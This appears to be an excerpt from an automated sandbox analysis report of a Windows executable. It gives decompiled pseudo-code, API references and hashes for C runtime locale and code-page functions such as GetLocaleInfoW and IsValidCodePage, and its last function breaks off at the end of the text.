0x004213d1
0x004213d3
0x00000000
0x00000000
0x004213d5
0x004213da
0x004213dc
0x004213dc
0x004213e2
0x00000000
0x00000000
0x004213e7
0x00421405
0x00421407
0x0042142a
0x00000000
0x0042142f
0x00421417
0x00421422
0x00000000
0x00000000
0x00421424
0x00000000
0x00421424
0x004213e9
0x004213f1
0x00000000
0x00000000
0x004213f3
0x004213f6
0x004213fc
0x00000000
0x00000000
0x00000000
0x004213fe
0x00421400
0x00421402
0x00000000
0x00421402
0x004213b3
0x004213bb
0x00000000
0x00000000
0x004213bd
0x004213c0
0x004213c6
0x00000000
0x00000000
0x00000000
0x004213c6
0x004213cc
0x004213ce
0x00000000

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004216A0,?,00000000), ref: 0042141A
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004216A0,?,00000000), ref: 00421443
GetACP.KERNEL32(?,?,004216A0,?,00000000), ref: 00421458

Strings

ACP, xrefs: 0042139F
OCP, xrefs: 004213D5

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: b631a730b23fd26f1204312fcb8d9b35702ea9cd839a2712995ee24016e3cc50
Instruction ID: 1539a11ba781899f5db447ae6822ef52dfd50048b589875d3a8db615cc1f187f
Opcode Fuzzy Hash: b631a730b23fd26f1204312fcb8d9b35702ea9cd839a2712995ee24016e3cc50
Instruction Fuzzy Hash: DF21B232700124A6E734DF15E900AA7B3A7AF74B54BE68066ED0ED7720EB36DD42C358

Uniqueness

Uniqueness Score: -1.00%

Function 00421555, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00421555(void* __ecx, void* __edx, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t87;
				short* _t91;
				void* _t93;
				short** _t101;
				short* _t102;
				signed int _t105;
				signed short _t108;
				signed int _t110;
				void* _t111;

				_t39 =  *0x438070; // 0xf2c84916
				_v8 = _t39 ^ _t110;
				_t87 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00418C71(_t87, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00418C71(_t87, __ecx, __edx);
				_t98 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t101 =  &(_t46[1]);
				 *_t101 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t83 =  *0x42e1dc; // 0x17
					E004214F8(0, 0x42e0c8, _t83 - 1, _t101);
					_t46 = _v24;
					_t111 = _t111 + 0xc;
					_t98 = 0;
				}
				_v20 = _t98;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t98) {
					_t48 =  *_t101;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t98;
					if( *_t48 == _t98) {
						goto L19;
					}
					E00420E95(_t91, _t98,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t70 =  *_t101;
					if(_t70 == 0 ||  *_t70 == _t98) {
						E00420F7B(_t91, _t98,  &_v20);
					} else {
						E00420EE0(_t91, _t98,  &_v20);
					}
					_pop(_t91);
					if(_v20 != 0) {
						_t102 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t73 =  *0x42e0c4; // 0x41
						_t75 = E004214F8(_t98, 0x42ddb8, _t73 - 1, _v24);
						_t111 = _t111 + 0xc;
						if(_t75 == 0) {
							L20:
							_t102 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E00421381(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t93);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t55 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t55;
								if(_t55 == 0) {
									goto L22;
								}
								_t56 = IsValidLocale(_v16, 1);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = _v28;
								__eflags = _t57;
								if(__eflags != 0) {
									 *_t57 = _t108;
								}
								E0041A29E(_t87, _t93, _t102, __eflags, _v16,  &(_v24[0x94]), 0x55, _t102);
								__eflags = _t87;
								if(__eflags == 0) {
									L36:
									_t53 = 1;
									L23:
									E0040AEA8();
									return _t53;
								}
								_t33 =  &(_t87[0x90]); // 0x4171c8
								E0041A29E(_t87, _t93, _t102, __eflags, _v16, _t33, 0x55, _t102);
								_t64 = GetLocaleInfoW(_v16, 0x1001, _t87, 0x40);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L22;
								}
								_t36 =  &(_t87[0x40]); // 0x417128
								_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t38 =  &(_t87[0x80]); // 0x4171a8
								E00423F30(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t101;
						_t102 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E00420F7B(_t91, _t98,  &_v20);
						} else {
							E00420EE0(_t91, _t98,  &_v20);
						}
						_pop(_t91);
						goto L21;
					}
				}
			}

0x0042155d
0x00421564
0x0042156b
0x0042156f
0x00421573
0x00421581
0x00421586
0x00421587
0x00421588
0x00421589
0x00421591
0x00421593
0x00421599
0x0042159f
0x004215a2
0x004215a4
0x004215a7
0x004215ab
0x004215b2
0x004215bf
0x004215c4
0x004215c7
0x004215ca
0x004215ca
0x004215cc
0x004215cf
0x004215d3
0x00421643
0x00421645
0x00421647
0x0042165a
0x0042165a
0x00421661
0x00421667
0x0042166a
0x00000000
0x0042166a
0x00421649
0x0042164c
0x00000000
0x00000000
0x00421652
0x00421657
0x00000000
0x004215da
0x004215da
0x004215de
0x004215f4
0x004215e5
0x004215e9
0x004215e9
0x004215fd
0x004215fe
0x00421688
0x00421688
0x00000000
0x00421604
0x00421604
0x00421613
0x00421618
0x0042161d
0x0042166d
0x0042166d
0x0042166d
0x0042166f
0x00421673
0x0042168a
0x00421696
0x004216a0
0x004216a3
0x004216a4
0x004216a6
0x00000000
0x00000000
0x004216a8
0x004216ae
0x00000000
0x00000000
0x004216b0
0x004216b6
0x00000000
0x00000000
0x004216bc
0x004216c2
0x004216c4
0x00000000
0x00000000
0x004216cb
0x004216d1
0x004216d3
0x00000000
0x00000000
0x004216d5
0x004216d8
0x004216da
0x004216dc
0x004216dc
0x004216ed
0x004216f2
0x004216f4
0x00421754
0x00421756
0x00421677
0x0042167f
0x00421687
0x00421687
0x004216f9
0x00421703
0x00421713
0x00421719
0x0042171b
0x00000000
0x00000000
0x00421723
0x00421732
0x00421738
0x0042173a
0x00000000
0x00000000
0x00421744
0x0042174c
0x00000000
0x00421751
0x00421675
0x00421675
0x00000000
0x00421675
0x0042161f
0x00421621
0x00421625
0x0042163b
0x0042162c
0x00421630
0x00421630
0x00421640
0x00000000
0x00421640
0x004215fe

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

Part of subcall function 00418C71: _free.LIBCMT ref: 00418CD0
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CDD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00421661
IsValidCodePage.KERNEL32(00000000), ref: 004216BC
IsValidLocale.KERNEL32(?,00000001), ref: 004216CB
GetLocaleInfoW.KERNEL32(?,00001001,004170A8,00000040,?,004171C8,00000055,00000000,?,?,00000055,00000000), ref: 00421713
GetLocaleInfoW.KERNEL32(?,00001002,00417128,00000040), ref: 00421732

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: f61dd782a460727888bf6fbccdfdea1bc5f405e1de6c754d2531e9e559edbafe
Instruction ID: 094e1dd0938e3c22688404818f57c3d98cecb4846e99d48a61b23a45e693ad1e
Opcode Fuzzy Hash: f61dd782a460727888bf6fbccdfdea1bc5f405e1de6c754d2531e9e559edbafe
Instruction Fuzzy Hash: C851B471B00225AFDB20DF65EC41BBF73B8EF65700F88006BE900E7260E77899418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00420C1D, Relevance: 6.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00420C1D(void* __ecx, void* __edx, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t64;
				signed int _t65;
				void* _t66;
				void* _t69;
				void* _t74;
				void* _t78;
				void* _t84;
				intOrPtr _t85;
				short* _t87;
				void* _t88;
				void* _t90;
				short _t92;
				void* _t93;
				intOrPtr* _t96;
				void* _t110;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				signed int _t130;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_push(_t84);
				_t34 = E00418C71(_t84, __ecx, __edx);
				_t85 = _a4;
				_t92 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t35;
				_t36 = _t85 + 0x80;
				 *_t123 = _t85;
				 *_t116 = _t36;
				if( *_t36 != 0) {
					E00420BAE(0x42e0c8, 0x16, _t116);
					_t131 = _t131 + 0xc;
					_t92 = 0;
				}
				_push(_t123);
				if( *((intOrPtr*)( *_t123)) == _t92) {
					E0042051F(_t85, _t92, _t116, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t92) {
						E00420642();
					} else {
						E004205A8(_t92);
					}
					_pop(_t93);
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t78 = E00420BAE(0x42ddb8, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t78 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E00420642();
							} else {
								E004205A8(0);
							}
							L12:
							_pop(_t93);
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t125 = E00420A7C(_t93, _t85 + 0x100, _t123);
					if(_t125 == 0 || _t125 == 0xfde8 || _t125 == 0xfde9 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t96 = _v8;
							_t15 = _t119 + 0x120; // 0x4171cf
							_t87 = _t15;
							 *_t87 = 0;
							_t114 = _t96 + 2;
							do {
								_t47 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t47 != _v12);
							_t98 = _t96 - _t114 >> 1;
							_push((_t96 - _t114 >> 1) + 1);
							_t49 = E0041F12B(_t96 - _t114 >> 1, _t87, 0x55, _v8);
							_t132 = _t131 + 0x10;
							_t151 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00413735();
								asm("int3");
								_t130 = _t132;
								_t52 =  *0x438070; // 0xf2c84916
								_v52 = _t52 ^ _t130;
								_push(_t87);
								_push(_t125);
								_push(_t119);
								_t88 = E00418C71(_t87, _t98, _t114);
								_t120 =  *(E00418C71(_t88, _t98, _t114) + 0x34c);
								_t127 = E00421330(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t127, ( ~( *(_t88 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E0041E061(_t88, _t120, _t127,  *((intOrPtr*)(_t88 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t65 = E00421464(_t127);
										__eflags = _t65;
										if(_t65 != 0) {
											 *_t120 =  *_t120 | 0x00000004;
											__eflags =  *_t120;
											_t120[2] = _t127;
											_t120[1] = _t127;
										}
									}
									_t64 =  !( *_t120 >> 2) & 0x00000001;
									__eflags = _t64;
								} else {
									 *_t120 =  *_t120 & _t58;
									_t64 = _t58 + 1;
								}
								__eflags = _v32 ^ _t130;
								E0040AEA8();
								return _t64;
							} else {
								_t66 = E0041A0B2(_t98, _t151, _t87, 0x1001, _t119, 0x40);
								_t152 = _t66;
								if(_t66 == 0) {
									goto L31;
								} else {
									_t20 = _t119 + 0x80; // 0x41712f
									_t90 = _t20;
									_t21 = _t119 + 0x120; // 0x4171cf
									if(E0041A0B2(_t98, _t152, _t21, 0x1002, _t90, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t69 = E00424EFB(_t98);
										_t110 = _t90;
										if(_t69 != 0) {
											L28:
											_t22 = _t119 + 0x120; // 0x4171cf
											if(E0041A0B2(_t110, _t155, _t22, 7, _t90, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t74 = E00424EFB(_t110);
											_t110 = _t90;
											_t155 = _t74;
											if(_t74 == 0) {
												L29:
												_t23 = _t119 + 0x100; // 0x4171af
												E00423F30(_t110, _t125, _t23, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x00420c22
0x00420c23
0x00420c24
0x00420c27
0x00420c2c
0x00420c2f
0x00420c31
0x00420c34
0x00420c34
0x00420c37
0x00420c37
0x00420c3d
0x00420c40
0x00420c43
0x00420c43
0x00420c46
0x00420c49
0x00420c4f
0x00420c51
0x00420c56
0x00420c60
0x00420c65
0x00420c68
0x00420c68
0x00420c6c
0x00420c70
0x00420cb9
0x00000000
0x00420c72
0x00420c77
0x00420c80
0x00420c79
0x00420c79
0x00420c79
0x00420c87
0x00420c8b
0x00420c95
0x00420c9a
0x00420c9f
0x00420ca5
0x00420ca9
0x00420cb2
0x00420cab
0x00420cab
0x00420cab
0x00420cbe
0x00420cbe
0x00420cbe
0x00420c9f
0x00420c8b
0x00420cc4
0x00420dd6
0x00420dd6
0x00420dd6
0x00000000
0x00420cca
0x00420cd7
0x00420cdd
0x00000000
0x00420d0d
0x00420d0d
0x00420d12
0x00420d14
0x00420d14
0x00420d16
0x00420d1b
0x00420dd1
0x00420dd3
0x00000000
0x00420d21
0x00420d21
0x00420d24
0x00420d24
0x00420d2c
0x00420d2f
0x00420d32
0x00420d32
0x00420d35
0x00420d38
0x00420d40
0x00420d45
0x00420d4c
0x00420d51
0x00420d54
0x00420d56
0x00420de1
0x00420de2
0x00420de3
0x00420de4
0x00420de5
0x00420de6
0x00420deb
0x00420def
0x00420df7
0x00420dfe
0x00420e01
0x00420e02
0x00420e06
0x00420e0c
0x00420e14
0x00420e23
0x00420e2f
0x00420e40
0x00420e46
0x00420e48
0x00420e59
0x00420e60
0x00420e62
0x00420e65
0x00420e6b
0x00420e6d
0x00420e6f
0x00420e6f
0x00420e72
0x00420e75
0x00420e75
0x00420e6d
0x00420e7f
0x00420e7f
0x00420e4a
0x00420e4a
0x00420e4c
0x00420e4c
0x00420e87
0x00420e8a
0x00420e92
0x00420d5c
0x00420d65
0x00420d6a
0x00420d6c
0x00000000
0x00420d6e
0x00420d70
0x00420d70
0x00420d7c
0x00420d8a
0x00000000
0x00420d8c
0x00420d8c
0x00420d8f
0x00420d95
0x00420d98
0x00420da8
0x00420dad
0x00420dbb
0x00000000
0x00000000
0x00000000
0x00000000
0x00420d9a
0x00420d9a
0x00420d9d
0x00420da3
0x00420da4
0x00420da6
0x00420dbd
0x00420dc1
0x00420dc9
0x00000000
0x00000000
0x00000000
0x00000000
0x00420da6
0x00420d98
0x00420d8a
0x00420dd8
0x00420dde
0x00420dde
0x00420d56
0x00420d1b
0x00420cdd

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004170AF,?,?,?,?,00416B06,?,00000006), ref: 00420CFF
_wcschr.LIBVCRUNTIME ref: 00420D8F
_wcschr.LIBVCRUNTIME ref: 00420D9D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004170AF,00000000,004171CF), ref: 00420E40

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 8004afbb318597ceba18595073f8fdee11558cccf19662a5342b57004e7e0800
Instruction ID: ec93a0a13f1851815a8e1b077bab4e62282615d160078122b8cd06a8d8c7eafd
Opcode Fuzzy Hash: 8004afbb318597ceba18595073f8fdee11558cccf19662a5342b57004e7e0800
Instruction Fuzzy Hash: 46611876701326AAD724AB76EC41BB773E8EF04704F54052FF905D7282EA78E94087A9

Uniqueness

Uniqueness Score: -1.00%

Function 00421008, Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00421008(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t50;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				intOrPtr* _t112;
				void* _t116;
				intOrPtr* _t118;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				signed int* _t128;
				int _t132;
				signed int _t134;
				void* _t135;

				_t50 =  *0x438070; // 0xf2c84916
				_v8 = _t50 ^ _t134;
				_push(_t89);
				_t90 = E00418C71(_t89, __ecx, __edx);
				_t128 =  *(E00418C71(_t90, __ecx, __edx) + 0x34c);
				_t132 = E00421330(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = E0041E061(_t90, _t128, _t132,  *((intOrPtr*)(_t90 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t128 & 0x00000300) - 0x300;
						if(( *_t128 & 0x00000300) == 0x300) {
							L39:
							_t64 =  !( *_t128 >> 2) & 0x00000001;
							__eflags = _t64;
							L40:
							E0040AEA8();
							return _t64;
						}
						asm("sbb ecx, ecx");
						_t66 = GetLocaleInfoW(_t132, ( ~( *(_t90 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t66;
						if(_t66 != 0) {
							_t68 = E0041E061(_t90, _t128, _t132,  *((intOrPtr*)(_t90 + 0x50)),  &_v248);
							__eflags = _t68;
							if(_t68 != 0) {
								__eflags =  *(_t90 + 0x60);
								if( *(_t90 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t90 + 0x5c);
								if( *(_t90 + 0x5c) == 0) {
									goto L39;
								}
								_t71 = E0041E061(_t90, _t128, _t132,  *((intOrPtr*)(_t90 + 0x50)),  &_v248);
								__eflags = _t71;
								if(_t71 != 0) {
									goto L39;
								}
								_push(_t128);
								_t72 = E00421488(0, _t132, 0);
								__eflags = _t72;
								if(_t72 == 0) {
									goto L39;
								}
								 *_t128 =  *_t128 | 0x00000100;
								__eflags = _t128[1];
								L37:
								if(__eflags == 0) {
									_t128[1] = _t132;
								}
								goto L39;
							}
							 *_t128 =  *_t128 | 0x00000200;
							_t122 =  *_t128;
							__eflags =  *(_t90 + 0x60) - _t68;
							if( *(_t90 + 0x60) == _t68) {
								__eflags =  *(_t90 + 0x5c) - _t68;
								if( *(_t90 + 0x5c) == _t68) {
									goto L23;
								}
								_t112 =  *((intOrPtr*)(_t90 + 0x50));
								_v256 = _t112 + 2;
								do {
									_t74 =  *_t112;
									_t112 = _t112 + 2;
									__eflags = _t74 - _v252;
								} while (_t74 != _v252);
								__eflags = _t112 - _v256 >> 1 -  *(_t90 + 0x5c);
								if(_t112 - _v256 >> 1 !=  *(_t90 + 0x5c)) {
									_t68 = 0;
									goto L23;
								}
								_push(_t128);
								_t75 = E00421488(_t90, _t132, 1);
								__eflags = _t75;
								if(_t75 == 0) {
									goto L39;
								}
								 *_t128 =  *_t128 | 0x00000100;
								_t68 = 0;
								L24:
								__eflags = _t128[1] - _t68;
								goto L37;
							}
							L23:
							_t123 = _t122 | 0x00000100;
							__eflags = _t123;
							 *_t128 = _t123;
							goto L24;
						}
						 *_t128 = _t66;
						L2:
						_t64 = 1;
						goto L40;
					}
					asm("sbb eax, eax");
					_t82 = GetLocaleInfoW(_t132, ( ~( *(_t90 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t82;
					if(_t82 == 0) {
						goto L1;
					}
					_t84 = E0041E061(_t90, _t128, _t132,  *((intOrPtr*)(_t90 + 0x50)),  &_v248);
					_pop(_t116);
					__eflags = _t84;
					if(_t84 != 0) {
						__eflags =  *_t128 & 0x00000002;
						if(( *_t128 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t90 + 0x5c);
						if( *(_t90 + 0x5c) == 0) {
							L14:
							_t124 =  *_t128;
							__eflags = _t124 & 0x00000001;
							if((_t124 & 0x00000001) != 0) {
								goto L18;
							}
							_t85 = E00421464(_t132);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L18;
							}
							_t125 = _t124 | 0x00000001;
							__eflags = _t125;
							 *_t128 = _t125;
							goto L17;
						}
						_t87 = E004228B2(_t90, _t116, _t132,  *((intOrPtr*)(_t90 + 0x50)),  &_v248,  *(_t90 + 0x5c));
						_t135 = _t135 + 0xc;
						__eflags = _t87;
						if(_t87 != 0) {
							goto L14;
						}
						 *_t128 =  *_t128 | 0x00000002;
						__eflags =  *_t128;
						_t128[2] = _t132;
						_t118 =  *((intOrPtr*)(_t90 + 0x50));
						_t126 = _t118 + 2;
						do {
							_t88 =  *_t118;
							_t118 = _t118 + 2;
							__eflags = _t88 - _v252;
						} while (_t88 != _v252);
						__eflags = _t118 - _t126 >> 1 -  *(_t90 + 0x5c);
						if(_t118 - _t126 >> 1 ==  *(_t90 + 0x5c)) {
							_t128[1] = _t132;
						}
					} else {
						 *_t128 =  *_t128 | 0x00000304;
						_t128[1] = _t132;
						L17:
						_t128[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t128 =  *_t128 & 0x00000000;
				goto L2;
			}

0x00421013
0x0042101a
0x0042101d
0x00421028
0x00421030
0x0042103f
0x0042104b
0x00421064
0x0042107b
0x00421080
0x00421089
0x0042108b
0x0042113e
0x00421147
0x00421149
0x0042123b
0x00421242
0x00421242
0x00421245
0x0042124d
0x00421255
0x00421255
0x0042115c
0x0042116d
0x00421173
0x00421175
0x00421188
0x0042118f
0x00421191
0x004211fd
0x00421200
0x00000000
0x00000000
0x00421202
0x00421205
0x00000000
0x00000000
0x00421211
0x00421218
0x0042121a
0x00000000
0x00000000
0x0042121c
0x00421221
0x00421229
0x0042122b
0x00000000
0x00000000
0x0042122d
0x00421233
0x00421236
0x00421236
0x00421238
0x00421238
0x00000000
0x00421236
0x00421193
0x00421199
0x0042119b
0x0042119e
0x004211b0
0x004211b3
0x00000000
0x00000000
0x004211b5
0x004211bb
0x004211c1
0x004211c1
0x004211c4
0x004211c7
0x004211c7
0x004211d8
0x004211db
0x004211f7
0x00000000
0x004211f7
0x004211dd
0x004211e1
0x004211e9
0x004211eb
0x00000000
0x00000000
0x004211ed
0x004211f3
0x004211a8
0x004211a8
0x00000000
0x004211a8
0x004211a0
0x004211a0
0x004211a0
0x004211a6
0x00000000
0x004211a6
0x00421177
0x00421069
0x0042106b
0x00000000
0x0042106b
0x0042109f
0x004210ad
0x004210b3
0x004210b5
0x00000000
0x00000000
0x004210c1
0x004210c7
0x004210c8
0x004210ca
0x004210d7
0x004210da
0x00000000
0x00000000
0x004210dc
0x004210e0
0x00421124
0x00421124
0x00421126
0x00421129
0x00000000
0x00000000
0x0042112c
0x00421132
0x00421134
0x00000000
0x00000000
0x00421136
0x00421136
0x00421139
0x00000000
0x00421139
0x004210ef
0x004210f4
0x004210f7
0x004210f9
0x00000000
0x00000000
0x004210fb
0x004210fb
0x004210fe
0x00421101
0x00421104
0x00421107
0x00421107
0x0042110a
0x0042110d
0x0042110d
0x0042111a
0x0042111d
0x0042111f
0x0042111f
0x004210cc
0x004210cc
0x004210d2
0x0042113b
0x0042113b
0x0042113b
0x00000000
0x004210ca
0x00421066
0x00421066
0x00000000

APIs

Part of subcall function 00418C71: GetLastError.KERNEL32(?,00000000,00410626,00000000,00000000,?,0041BD67,00000000,00000000,?), ref: 00418C75
Part of subcall function 00418C71: _free.LIBCMT ref: 00418CA8
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CE9
Part of subcall function 00418C71: _abort.LIBCMT ref: 00418CEF

Part of subcall function 00418C71: _free.LIBCMT ref: 00418CD0
Part of subcall function 00418C71: SetLastError.KERNEL32(00000000,00000000,?), ref: 00418CDD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042105C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004210AD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042116D

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ee1da4cc59e7b91bef4a81080a5b5cd9706e1a82aaf4716ede8544403ad91a8b
Instruction ID: 44ff2bc2706231c5244fba6e0acf7835daa671471fdd4530653835a3899e3cbd
Opcode Fuzzy Hash: ee1da4cc59e7b91bef4a81080a5b5cd9706e1a82aaf4716ede8544403ad91a8b
Instruction Fuzzy Hash: 3261D571700227DBDB289F25DC82BB6B7A8EF28304F5040BBED05D6694E778D991CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041353E, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041353E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x438070; // 0xf2c84916
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0040B1B7(_t41);
					_pop(_t60);
				}
